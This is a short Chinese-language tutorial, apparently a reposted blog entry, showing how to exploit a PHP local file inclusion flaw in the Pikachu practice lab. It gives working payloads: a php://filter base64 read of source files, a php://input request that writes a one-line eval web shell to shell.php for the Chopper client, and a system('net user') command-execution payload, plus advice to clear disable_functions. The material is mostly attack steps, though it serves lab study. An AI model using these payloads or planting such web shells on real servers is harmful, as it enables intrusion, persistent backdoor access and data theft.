包含漏洞-读写文件以及执行命令
包含漏洞可以讀寫文件以及執行命令
讀文件:
最好轉化為base64,防止有特殊字符顯示不出來
php://filter/read=convert.base64-encode/resource=【文件名】用pikachu靶場演示:
讀一下當前展示的這個PHP內容
寫文件:
寫入一句話木馬 我用的是菜刀馬 <?php @eval($_POST['123']);?>
需要修改一個地方 參數等于文件的地方 要改成 php://input
比如 http://192.168.56.128/pikachu/vul/fileinclude/fi_local.php?filename=file1.php
修改 http://192.168.56.128/pikachu/vul/fileinclude/fi_local.php?filename=php://input
之后在數據包里寫入一句話
<?php fputs(fopen('shell.php','w'),'<?php @eval($_POST[123]); ?>'); ?>
用菜刀連接:連接密碼 123
由于是在當前文件夾寫入的木馬文件,所以是在fi_remote.php 同一目錄下的
命令執行:
- phpStudy 只有在allow _url_include為on的時候才可以使用
- phpStudy 下找到php.ini打開,查找 disable_functions = 將其清空刪掉重啟apache 才能看到結果
需要修改一個地方 參數等于文件的地方 要改成 php://input
比如 http://192.168.56.128/pikachu/vul/fileinclude/fi_local.php?filename=file1.php
修改 http://192.168.56.128/pikachu/vul/fileinclude/fi_local.php?filename=php://input
提交數據包為:<?php system('net user');?>
總結
以上是生活随笔為你收集整理的包含漏洞-读写文件以及执行命令的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: xcode-select --insta
- 下一篇: No operations allowe